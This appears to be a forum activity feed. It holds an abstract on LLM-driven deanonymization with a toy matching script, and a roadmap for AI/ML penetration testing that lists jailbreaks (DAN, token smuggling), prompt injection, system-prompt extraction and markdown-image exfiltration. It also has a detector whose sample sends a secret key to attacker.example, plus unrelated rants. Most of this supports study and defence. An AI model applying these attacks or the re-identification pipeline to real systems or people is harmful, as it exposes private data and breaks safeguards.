All Activity
- Today
-
gg88mov joined the community
-
We show that large language models can be used to perform at-scale deanonymization. With full Internet access, our agent can re-identify Hacker News users and Anthropic Interviewer participants at high precision, given pseudonymous online profiles and conversations alone, matching what would take hours for a dedicated human investigator. We then design attacks for the closed-world setting. Given two databases of pseudonymous individuals, each containing unstructured text written by or about that individual, we implement a scalable attack pipeline that uses LLMs to: (1) extract identity-relevant features, (2) search for candidate matches via semantic embeddings, and (3) reason over top candidates to verify matches and reduce false positives. Compared to classical deanonymization work (e.g., on the Netflix Prize) that required structured data, our approach works directly on raw user content across arbitrary platforms. We construct three datasets with known ground-truth data to evaluate our attacks. The first links Hacker News to LinkedIn profiles, using cross-platform references that appear in the profiles. Our second dataset matches users across Reddit movie discussion communities; and the third splits a single user's Reddit history in time to create two pseudonymous profiles to be matched. In each setting, LLM-based methods substantially outperform classical baselines, achieving up to 68% recall at 90% precision, compared to near 0% for the best non-LLM method. Our results show that the practical obscurity protecting pseudonymous users online no longer holds and that threat models for online privacy need to be reconsidered. Download: https://arxiv.org/pdf/2602.16800
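The three-step closed-world pipeline the abstract describes (feature extraction, embedding search, candidate verification) can be sketched in miniature. This is a toy illustration, not the paper's implementation: it substitutes bag-of-words vectors for LLM-derived semantic embeddings and a cosine-similarity threshold for the LLM verification step, and all user names and texts are made up.

```python
import math
from collections import Counter

def embed(text):
    # Toy stand-in for a semantic embedding model: a bag-of-words vector.
    return Counter(text.lower().split())

def cosine(a, b):
    # Cosine similarity between two sparse count vectors.
    dot = sum(a[t] * b[t] for t in a if t in b)
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0

def match_profiles(db_a, db_b, threshold=0.5):
    """For each pseudonymous profile in db_a, retrieve the most similar
    candidate in db_b, then 'verify' it against a threshold to suppress
    false positives (the paper uses an LLM for this last step)."""
    emb_b = {uid: embed(txt) for uid, txt in db_b.items()}
    matches = {}
    for uid_a, txt_a in db_a.items():
        ea = embed(txt_a)
        best = max(emb_b, key=lambda u: cosine(ea, emb_b[u]))
        if cosine(ea, emb_b[best]) >= threshold:
            matches[uid_a] = best
    return matches

db_a = {"hn_user1": "rust compiler internals and espresso machines",
        "hn_user2": "gardening tomatoes in cold climates"}
db_b = {"li_userX": "writes about rust compiler internals and loves espresso",
        "li_userY": "food blogger"}
print(match_profiles(db_a, db_b))  # → {'hn_user1': 'li_userX'}
```

Note how the threshold implements the precision/recall trade-off the paper reports: raising it drops uncertain matches (here, `hn_user2` has no candidate above 0.5 and is left unmatched).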
-
## 🛡️ AI/ML Pentesting Roadmap

A comprehensive, structured guide to learning AI/ML security and penetration testing — from zero to practitioner.

### 📋 Table of Contents

- Prerequisites
- Phase 1 — Foundations
- Phase 2 — AI/ML Security Concepts
- Phase 3 — Prompt Injection & LLM Attacks
- Phase 4 — Hands-On Practice
- Phase 5 — Advanced Exploitation Techniques
- Phase 6 — Real-World Research & Bug Bounty
- Standards, Frameworks & References
- Tools & Repositories
- Books, PDFs & E-Books
- Video Resources
- CTF & Competitions
- Bug Bounty Programs
- Community & News
- Suggested Learning Path by Experience Level

### Prerequisites

Before diving into AI/ML pentesting, ensure you have the following foundation:

**General Security Basics**
- PortSwigger Web Security Academy — free, hands-on web security training (XSS, SQLi, SSRF, etc.)
- TryHackMe — Pre-Security Path
- HackTheBox Academy
- OWASP Top 10

**Programming (Python is essential)**
- Python for Everybody — Coursera
- Automate the Boring Stuff with Python — free online book
- CS50P — Python — free Harvard course

**APIs & HTTP**
- Understand REST APIs, HTTP methods, headers, and authentication flows
- Postman Learning Center
- Practice with tools: curl, Burp Suite, Postman

### Phase 1 — Foundations

#### 1.1 Machine Learning Fundamentals

| Resource | Type | Cost |
| --- | --- | --- |
| Machine Learning — Andrew Ng (Coursera) | Course | Audit free |
| Introduction to ML — edX | Course | Audit free |
| fast.ai Practical Deep Learning | Course | Free |
| Google Machine Learning Crash Course | Course | Free |
| Kaggle ML Courses | Course | Free |
| 3Blue1Brown — Neural Networks | Video | Free |

#### 1.2 Large Language Models (LLMs)

Understanding how LLMs work is critical before attacking them.
| Resource | Type | Cost |
| --- | --- | --- |
| Andrej Karpathy — Intro to LLMs | Video | Free |
| Andrej Karpathy — Let's build GPT | Video | Free |
| Hugging Face NLP Course | Course | Free |
| LLM University by Cohere | Course | Free |
| Prompt Engineering Guide | Guide | Free |

### Phase 2 — AI/ML Security Concepts

#### 2.1 Core Security Concepts

- OWASP LLM Top 10 — the definitive OWASP list for LLM vulnerabilities
- MITRE ATLAS Matrix — Adversarial Threat Landscape for Artificial-Intelligence Systems
- NIST AI Risk Management Framework — US federal AI risk guidance
- IBM — AI Security Overview
- AI Village — LLM Threat Modeling
- Prompting Guide — Adversarial Attacks
- HackerOne — Ultimate Guide to Managing Ethical and Security Risks in AI

#### 2.2 Attack Surface Overview

Key attack vectors in AI/ML systems:

- Prompt Injection — manipulating LLM behavior through crafted inputs
- Jailbreaking — bypassing safety filters and guardrails
- Model Inversion — extracting training data from a model
- Membership Inference — determining whether data was in the training set
- Data Poisoning — corrupting training data to influence behavior
- Adversarial Examples — perturbed inputs that fool classifiers
- Model Extraction/Stealing — cloning a model via API queries
- Supply Chain Attacks — malicious models/weights on platforms like Hugging Face
- Insecure Plugin/Tool Integration — exploiting LLM agents with external tools
- Training Data Exfiltration — extracting memorized private data
- Denial of Service — overloading models via crafted prompts

#### 2.3 MLOps & Infrastructure Security

- From MLOps to MLOops — JFrog
- Offensive ML Playbook
- AI Exploits — ProtectAI
- Awesome AI Security — ottosulin

### Phase 3 — Prompt Injection & LLM Attacks

#### 3.1 Understanding Prompt Injection

- IBM Guide on Prompt Injection
- Simon Willison's Explanation of Prompt Injection
- Learn Prompting — Prompt Hacking and Injection
- PortSwigger LLM Attacks
- NCC Group — Exploring Prompt Injection Attacks
- Bugcrowd — AI Vulnerability Deep Dive: Prompt Injection

#### 3.2 Jailbreaking Techniques

- DAN (Do Anything Now) — classic jailbreak technique:
  Chatgpt-DAN Repo
- Role-playing / persona manipulation
- Token smuggling — encoding instructions to bypass filters
- Prompt leaking — extracting system prompts
- Indirect prompt injection — attacks via documents, web content, memory
- WideOpenAI — Jailbreak Collection
- PayloadsAllTheThings — Prompt Injection
- PALLMs — Payloads for Attacking LLMs

#### 3.3 Indirect Prompt Injection

A more sophisticated attack where malicious instructions are injected via external data sources (emails, documents, websites) that an LLM agent processes.

- Greshake — LLM Security / Not What You've Signed Up For
- Embrace The Red — Blog — comprehensive blog covering real-world indirect injection
- GitHub Copilot Chat: Prompt Injection to Data Exfiltration
- Google AI Studio Data Exfiltration

#### 3.4 Advanced Prompt Attack Techniques

- How to Persuade an LLM to Change Its System Prompt
- Bugcrowd Ultimate Guide to AI Security (PDF)
- Snyk OWASP Top 10 LLM (PDF)
- Vanna.AI Prompt Injection RCE — JFrog

### Phase 4 — Hands-On Practice

#### 4.1 Interactive Platforms & Games

| Platform | Description | Link |
| --- | --- | --- |
| Gandalf | LLM prompt testing game — extract the password | gandalf.lakera.ai |
| Prompt Airlines | Gamified prompt injection learning | promptairlines.com |
| Crucible | Interactive AI security challenges by Dreadnode | crucible.dreadnode.io |
| Immersive Labs AI | Structured AI security exercises | prompting.ai.immersivelabs.com |
| Secdim AI Games | Prompt injection games | play.secdim.com/game/ai |
| HackAPrompt | Community prompt injection competition | hackaprompt.com |
| PortSwigger LLM Labs | Hands-on web LLM attack labs | Web Security Academy |

#### 4.2 Vulnerable-by-Design Projects

| Repository | Description |
| --- | --- |
| Damn Vulnerable LLM Agent — WithSecureLabs | Intentionally vulnerable LLM agent |
| ScottLogic Prompt Injection Playground | Local prompt injection lab |
| Greshake LLM Security Tools | Proof-of-concept attacks |

#### 4.3 CTF Writeups to Study

- CTF Writeup — HackPack CTF 2024 LLM Edition
- LLM Pentest Writeups — System Weakness

### Phase 5 — Advanced Exploitation Techniques

#### 5.1 Agent & Tool Integration Attacks

When LLMs are integrated with tools (code execution, web browsing, file systems), the attack surface expands dramatically.

- LLM Pentest: Leveraging Agent Integration for RCE — BlazeInfoSec
- LLM Pentest: Leveraging Agent Integration for RCE (full)
- Dumping a Database with an AI Chatbot — Synack
- CSWSH Meets LLM Chatbots

#### 5.2 Data Exfiltration via LLMs

- Google AI Studio: LLM-Powered Data Exfiltration
- Google AI Studio Mass Data Exfil (Regression)
- Hacking Google Bard — From Prompt Injection to Data Exfiltration
- AWS Amazon Q Markdown Rendering Vulnerability
- GitHub Copilot Chat Data Exfiltration

#### 5.3 Account Takeover & Authentication Attacks

- ChatGPT Account Takeover — Wildcard Web Cache Deception
- Shockwave — Critical ChatGPT Vulnerability (Web Cache Deception)
- Security Flaws in ChatGPT Ecosystem — Salt Security
- OpenAI Allowed Unlimited Credit on New Accounts — Checkmarx

#### 5.4 XSS & Web Vulnerabilities in AI Products

- XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT — Imperva
- Zeroday on GitHub Copilot

#### 5.5 Model & Infrastructure Attacks

- ShellTorch Explained: Multiple Vulnerabilities in TorchServe (CVSS 9.9)
- From ChatBot to SpyBot: ChatGPT Post-Exploitation — Imperva

#### 5.6 Persistent Attacks & Memory Exploitation

- ChatGPT Persistent Denial of Service via Memory Attacks — Embrace the Red

#### 5.7 Adversarial Machine Learning

- CleverHans — adversarial example library
- ART (Adversarial Robustness Toolbox) — IBM
- Foolbox — Python toolbox for adversarial attacks

### Phase 6 — Real-World Research & Bug Bounty

#### 6.1 Notable Research & Disclosures

- We Hacked Google AI for $50,000 — LandH
- New Google Gemini Content Manipulation Vulnerabilities — HiddenLayer
- Jailbreak of Meta AI (Llama 3.1) Revealing Config Details
- Bypass Instructions to Manipulate Google Bard
- My LLM Bug Bounty Journey on Hugging Face Hub
- Anonymised Penetration Test Report — Volkis
- Lakera Real World LLM Exploits (PDF)

#### 6.2 How to Find LLM Vulnerabilities

Key areas to test when assessing an LLM-powered application:

- System prompt extraction — can you leak the hidden system prompt?
- Instruction override — can you make it ignore system-level instructions?
- Plugin/tool abuse — can agent tools be misused (SSRF, RCE, SQLi)?
- Data exfiltration via markdown — does the UI render markdown images?
- Persistent injection via memory — can you inject instructions that persist in memory/RAG?
- PII leakage — does the model reveal training data or other users' data?
- Cross-user data leakage — in multi-tenant apps, can you access other users' contexts?
- Authentication bypass — can you trick the LLM into performing privileged actions?

### Standards, Frameworks & References

| Resource | Description |
| --- | --- |
| OWASP LLM Top 10 | Top 10 LLM vulnerability classes |
| MITRE ATLAS | AI adversarial threat matrix |
| NIST AI RMF | US federal AI risk management framework |
| OWASP AI Exchange | Cross-industry AI security guidance |
| ISO/IEC 42001 | International AI management standard |
| ENISA AI Threat Landscape | EU AI threat landscape report |
| Google Secure AI Framework (SAIF) | Google's AI security framework |

### Tools & Repositories

#### Offensive Tools

| Tool | Purpose |
| --- | --- |
| Garak | LLM vulnerability scanner |
| PyRIT | Microsoft's Python Risk Identification Toolkit for LLMs |
| LLM Fuzzer | Fuzzing framework for LLMs |
| PALLMs | Payloads for attacking LLMs |
| PromptInject | Prompt injection attack framework |
| PurpleLlama / CyberSecEval | Meta's LLM security evaluation |

#### Defensive / Scanning Tools

| Tool | Purpose |
| --- | --- |
| Rebuff | Prompt injection detection |
| NeMo Guardrails | NVIDIA guardrail framework |
| Lakera Guard | Commercial prompt injection protection |
| AI Exploits — ProtectAI | Real-world ML exploit collection |
| ModelScan | Scan ML model files for malicious code |

#### Reference Lists

| Resource | Description |
| --- | --- |
| Awesome LLM Security — corca-ai | Curated LLM security list |
| Awesome LLM — Hannibal046 | Everything LLM, including security |
| Awesome AI Security — ottosulin | General AI security resources |
| LLM Hacker's Handbook | Comprehensive hacking handbook |
| PayloadsAllTheThings — Prompt Injection | Payload collection |
| WideOpenAI | Jailbreak and bypass collection |
| Chatgpt-DAN | DAN jailbreak collection |

### Books, PDFs & E-Books

| Resource | Link |
| --- | --- |
| LLM Hacker's Handbook | GitHub |
| OWASP Top 10 for LLM (Snyk) | PDF |
| Bugcrowd Ultimate Guide to AI Security | PDF |
| Lakera Real World LLM Exploits | PDF |
| HackerOne Ultimate Guide to Managing AI Risks | E-Book |
| Adversarial Machine Learning — Goodfellow et al. | arXiv |

### Video Resources

| Resource | Link |
| --- | --- |
| Penetration Testing Against and With AI/LLM/ML (Playlist) | YouTube |
| Andrej Karpathy — Intro to Large Language Models | YouTube |
| DEF CON AI Village Talks | YouTube |
| LiveOverflow — AI/ML Security | YouTube |
| 3Blue1Brown — Neural Networks Series | YouTube |
| John Hammond — AI Security Challenges | YouTube |
| Cybrary — Machine Learning Security | Cybrary |

### CTF & Competitions

| Competition | Description | Link |
| --- | --- | --- |
| Crucible | Ongoing AI security challenges | crucible.dreadnode.io |
| HackAPrompt | Annual prompt injection competition | hackaprompt.com |
| AI Village CTF (DEF CON) | Annual AI security CTF at DEF CON | aivillage.org |
| Gandalf | Self-paced LLM challenge | gandalf.lakera.ai |
| Prompt Airlines | Gamified injection challenges | promptairlines.com |
| Hack The Box AI Challenges | HTB AI-themed challenges | hackthebox.com |
| Secdim AI Games | Web-based AI security games | play.secdim.com/game/ai |

### Bug Bounty Programs

AI/ML security bug bounties are growing rapidly.
Target these platforms:

| Program | Scope | Link |
| --- | --- | --- |
| OpenAI Bug Bounty | ChatGPT, API, plugins | bugcrowd.com/openai |
| Google AI Bug Bounty | Gemini, Bard, Vertex AI | bughunters.google.com |
| Meta AI Bug Bounty | Llama models, Meta AI | facebook.com/whitehat |
| HuggingFace via ProtectAI | Hub, models, spaces | huntr.com |
| Anthropic Bug Bounty | Claude, API | anthropic.com/security |
| Microsoft (Copilot, Azure AI) | Copilot, Azure OpenAI | msrc.microsoft.com |
| Huntr (AI/ML focused) | Open source ML libraries | huntr.com |

Tips for AI bug bounty:
- Focus on data exfiltration via markdown rendering (a common finding)
- Test plugin/tool integrations thoroughly
- Look for prompt injection in RAG pipelines
- Explore memory and persistent context manipulation
- Check for cross-tenant data leakage in multi-user deployments

### Community & News

#### Communities
- AI Village — DEF CON's AI security community
- OWASP AI Exchange — open standard for AI security
- ProtectAI — AI security research and tools
- Embrace the Red — Blog — leading blog on LLM security
- Kai Greshake's Research — indirect prompt injection research

#### Newsletters & Blogs
- The Batch — DeepLearning.AI — weekly AI news
- Simon Willison's Weblog — authoritative LLM security commentary
- HiddenLayer Research — AI security research
- Lakera Blog — LLM security insights
- PortSwigger Research — web + AI security research

### Suggested Learning Path by Experience Level

🟢 **Beginner (0–3 months)**
1. Complete PortSwigger Web Security Academy fundamentals
2. Learn Python basics
3. Take the Google ML Crash Course
4. Read the OWASP LLM Top 10
5. Play Gandalf — all levels
6. Read Simon Willison's prompt injection article
7. Watch Andrej Karpathy — Intro to LLMs

🟡 **Intermediate (3–9 months)**
1. Study the MITRE ATLAS Matrix
2. Complete the PortSwigger LLM Attack labs
3. Set up and exploit Damn Vulnerable LLM Agent
4. Complete Prompt Airlines and Crucible challenges
5. Read the LLM Hacker's Handbook
6. Study the Embrace the Red blog in full
7. Experiment with Garak and PyRIT
8. Try the Offensive ML Playbook

🔴 **Advanced (9+ months)**
1. Participate in the AI Village CTF at DEF CON
2. Submit findings to Huntr or the OpenAI Bug Bounty
3. Study adversarial ML with ART and CleverHans
4. Read academic papers on model inversion, membership inference, and data extraction
5. Contribute to open source tools like Garak or AI Exploits
6. Build your own vulnerable LLM demo environment
7. Write and publish research — blog posts, CVEs, conference talks

### Key Academic Papers

| Paper | Year |
| --- | --- |
| Explaining and Harnessing Adversarial Examples — Goodfellow et al. | 2014 |
| Extracting Training Data from Large Language Models — Carlini et al. | 2021 |
| Not What You've Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection — Greshake et al. | 2023 |
| Membership Inference Attacks against Machine Learning Models — Shokri et al. | 2017 |
| Universal and Transferable Adversarial Attacks on Aligned Language Models — Zou et al. | 2023 |
| Jailbroken: How Does LLM Safety Training Fail? — Wei et al. | 2023 |
| Prompt Injection Attack against LLM-integrated Applications | 2023 |

Last updated: 2025 | Contributions welcome — submit a PR with new resources.

Source: https://github.com/anmolksachan/AI-ML-Free-Resources-for-Security-and-Prompt-Injection
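The roadmap's most-repeated testing tip — data exfiltration via markdown rendering — is easy to check for from the defensive side. Below is a minimal, hypothetical helper (not part of any tool listed above): it scans model output for markdown image tags whose URL points at a non-allowlisted host, the classic channel by which injected instructions smuggle secrets out when a chat UI auto-renders images. The `ALLOWED_HOSTS` value is an assumption standing in for your application's own domains.

```python
import re

# Assumption for illustration: the app only serves images from its own domain.
ALLOWED_HOSTS = {"example-app.com"}

# Matches ![alt](http://host/path...) and captures the full URL and the host.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://([^/\s)]+)[^)\s]*)\)")

def find_exfil_images(llm_output):
    """Return markdown-image URLs in LLM output that point off-allowlist."""
    findings = []
    for m in MD_IMAGE.finditer(llm_output):
        url, host = m.group(1), m.group(2)
        if host not in ALLOWED_HOSTS:
            findings.append(url)
    return findings

out = "Here you go! ![x](https://attacker.example/log?q=SECRET_API_KEY)"
print(find_exfil_images(out))  # → ['https://attacker.example/log?q=SECRET_API_KEY']
```

When assessing an app, the offensive version of the same idea is to inject a prompt that asks the model to emit such an image with session data in the query string, then watch whether the UI fetches it.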
-
8sc88com joined the community
-
After you get some experience, jump into bug bounty! Let the money flow — the joy of Gigi Becali!
-
bk8codes joined the community
-
Like any other tool, we use it to ship faster. But we don't trust it. We verify the information, then we use it.
-
bslengoctuananh joined the community
-
And what do we do about AI?
-
lilyth joined the community
-
adammass00 changed their profile photo
-
Things to learn:
1. The technical side — the easiest part; you can find documentation.
2. Understanding business — know what needs companies have (selling to consumers, B2C, is generally less profitable, in my opinion).
3. Knowing how to speak, sell, explain, and knowing the legislation — non-technical skills, harder to pick up than the technical ones.
4. Combine everything you've learned, solve a real company need, bring value (like in manele), and sell it.
5. Grow the company, make money, and live a good life by hiring good people to work for you.
-
nowgoalhunet2 joined the community
-
Exactly — start here: https://www.dnsc.ro/pagini/inregistrare-entitati
-
sunwinheelp joined the community
-
How's the hacking going at the office, bosses?
j1ll2013 replied to pehokok715's topic in Non-IT Discussions
I propose you stop breaking the national security laws, because those of you doing CARDING are already being watched down to the bone marrow! I saw on TV that they convicted a rapper over "parsley" at some festival. Times are hard now with root, flooding, and the rest. -
gg88videoo joined the community
-
max79vipcom joined the community
- Yesterday
-
NoRo started following [Q] Advice for a future in CyberSecurity?
-
I want to start working on something for my future. What should I begin with for a future in cybersecurity?
-
Who votes to ban jill? React with an emoji to this post.
-
How's the hacking going at the office, bosses?
j1ll2013 replied to pehokok715's topic in Non-IT Discussions
-
Influence operation: planned actions meant to shape a target's perceptions and decisions. Can include disinformation, propaganda, and psychological manipulation. Framing / narrative manipulation: selective presentation of information to induce a desired conclusion.
-
How's the hacking going at the office, bosses?
j1ll2013 replied to pehokok715's topic in Non-IT Discussions
I should give out some PHONE NUMBERS!? You are crazy, kiddo! BUT WHAT IF I CALL THE FBI, BECAUSE RST IS A STING LIKE R00T-YOU, RYAN1918 AND OTHERS!? JAIL IS NOT GOOD. FOR KIDS, LIKE A SHRINK, I RECOMMEND MORE REST. The FBI has 56 field offices (also called divisions) centrally located in major metropolitan areas across the U.S. and Puerto Rico. They are the places where we carry out investigations, assess local and regional crime threats, and work closely with partners on cases and operations. Each field office is overseen by a special agent in charge, except our offices in Los Angeles, New York City, and Washington, D.C., which are headed by an assistant director in charge due to their large size. Within these field offices are a total of about 350 resident agencies located in smaller cities and towns. Resident agencies are managed by supervisory special agents. @UnixDevel Can you prove that? You can file an appeal if you are not guilty!? Read more about the amendments! https://constitutioncenter.org/the-constitution/amendments -
@j1ll2013 I'm calling in the American services now
-
How's the hacking going at the office, bosses?
UnixDevel replied to pehokok715's topic in Non-IT Discussions
Hey @j1ll2013, change your dealer, bro, he's selling you bad stuff. Trump and his team are doing just fine off the dump they pulled on their shitcoin. -
How's the hacking going at the office, bosses?
j1ll2013 replied to pehokok715's topic in Non-IT Discussions
Ok. You heard about the Delimano family? Tell me, how many states does the USA have!? You heard about the financial crisis in America and how harsh the times the USA went through on 9/11 were! What do you think about President Donald Trump!? Can you tell me the difference between the USA and Romania in leadership? You know that in the USA the president is like a prime minister, and I mean that in Romania the president has limited powers. Dear Ganja, tell me about the Frost/Nixon scandal. You know that an American citizen is well protected all around the world. Please learn more English and we'll speak later, because I am a bodyguard, but I was born in the USA. Get rich or die tryin'! I suggest you listen to Immortal Technique and read more about the foreign policy of the United States. You've heard about Obama, Rubio, JD Vance or Martin Luther King. I have a dream, but Romania lives in a nightmare. Please put on a VPN if you are a black hat hacker, because you will get pwned soon if you scan / steal from citizens all over the world! Ok, jail is not for you, but maybe... Search for honeypots and learn more about OSINT and Big Data. You are monitored by Echelon. But is it democracy? We make America great again! You can get treated in the USA for terminal diseases! Search for TEDx on YouTube, learn more, watch movies, and get better day by day. Good luck! -
Christopher Columbus reached America on October 12, 1492, sailing west in search of a sea route to Asia. Backed by the monarchs of Spain, he crossed the Atlantic Ocean with three ships: the Niña, the Pinta, and the Santa María. Columbus landed on an island in the Bahamas, which he named San Salvador, believing he had reached the Indies. Although he was not the first person to reach the Americas, his voyage had a huge impact. The event opened the age of the great geographic discoveries, led to the European colonization of the Americas, and profoundly changed the economy and history of the world. Columbus got the route wrong because of erroneous calculations about the size of the Earth and the distance to Asia. He greatly underestimated the circumference of the globe and overestimated how far Asia extends eastward. Based on these wrong assumptions, Columbus believed that by sailing west across the Atlantic he would quickly reach Japan or China.
-
How's the hacking going at the office, bosses?
j1ll2013 replied to pehokok715's topic in Non-IT Discussions
The French Revolution (1789-1799) was a period of radical social and political upheaval that abolished absolute monarchy and feudalism in France. Triggered by the economic crisis and social inequalities, it promoted the Enlightenment ideals of "Liberté, égalité, fraternité". Key events included the fall of the Bastille, the Declaration of the Rights of Man, and the rise of Napoleon. WE ARE 200 YEARS BEHIND FRANCE. -
Where is the cat?
-
How's the hacking going at the office, bosses?
j1ll2013 replied to pehokok715's topic in Non-IT Discussions
I'M BACK FROM WORK AGAIN. GUARD DUTY AGAIN. SOME GUYS (ROMA) ALMOST KILLED ME, THEY TRIED TO BREAK IN. - Last week
-
yes
-
It's just an exhortation not to smoke, bro :)))) If I urge you to respect the law in baboon-land, the country of Mucusor and of the intelligence services, there's nothing illegal about that 🤣
-
How's the hacking going at the office, bosses?
j1ll2013 replied to pehokok715's topic in Non-IT Discussions
Drug use and possession for personal use are illegal in Romania, punishable under Law 143/2000. Possession of "risk" drugs (e.g., cannabis) is punishable by 3 months to 2 years in prison or a fine, and "high-risk" drugs (e.g., heroin, cocaine) by 6 months to 3 years. Users can be enrolled in assistance programs. Incitement is punishable too, father Aelius! -
Dude, stop smoking "parsley"
-
How's the hacking going at the office, bosses?
j1ll2013 replied to pehokok715's topic in Non-IT Discussions
Law 51/1991 is the fundamental normative act defining Romania's national security as the state of legality, balance, and stability necessary for the development of the sovereign, unitary, and indivisible state, according to Sintact. It regulates threats to national security and the powers of institutions such as SRI, SIE, SPP, MApN, MAI, and the Ministry of Justice, coordinated by CSAT. AND IS PRISON ONLY FOR VIPs TOO!? HOW MANY ILLEGAL ACCESSES DO EACH OF YOU HAVE!? I JUST GOT BACK FROM GUARD DUTY. THINGS ARE GOING BADLY. I'M IN DEBT TO THE BANK BECAUSE I BOUGHT AN APARTMENT ON CREDIT. YOU'RE UPSETTING JEHOVAH, AND THE PATRIARCH TOO! GOOD THING I HAVE CHLORPROMAZINE ON PRESCRIPTION. I'VE GONE CRAZY FROM SO MUCH WORK. I WANT TO TELL YOU GUYS THAT YOU ARE IN BIG TROUBLE. YOU NEED TO PRAY TO GOD NOT TO END UP IN THE HOSPITAL BECAUSE YOU ARE TIRED. PLEASE GO TO SLEEP AND TAKE THE PILLS PRESCRIBED BY YOUR PERSONAL DOCTOR. IF YOU DON'T HAVE ONE, I SUGGEST CALLING 911, BECAUSE THERE IS A FINANCIAL CRISIS IN ROMANIA AND YOU NEED TO TAKE URGENT MEASURES.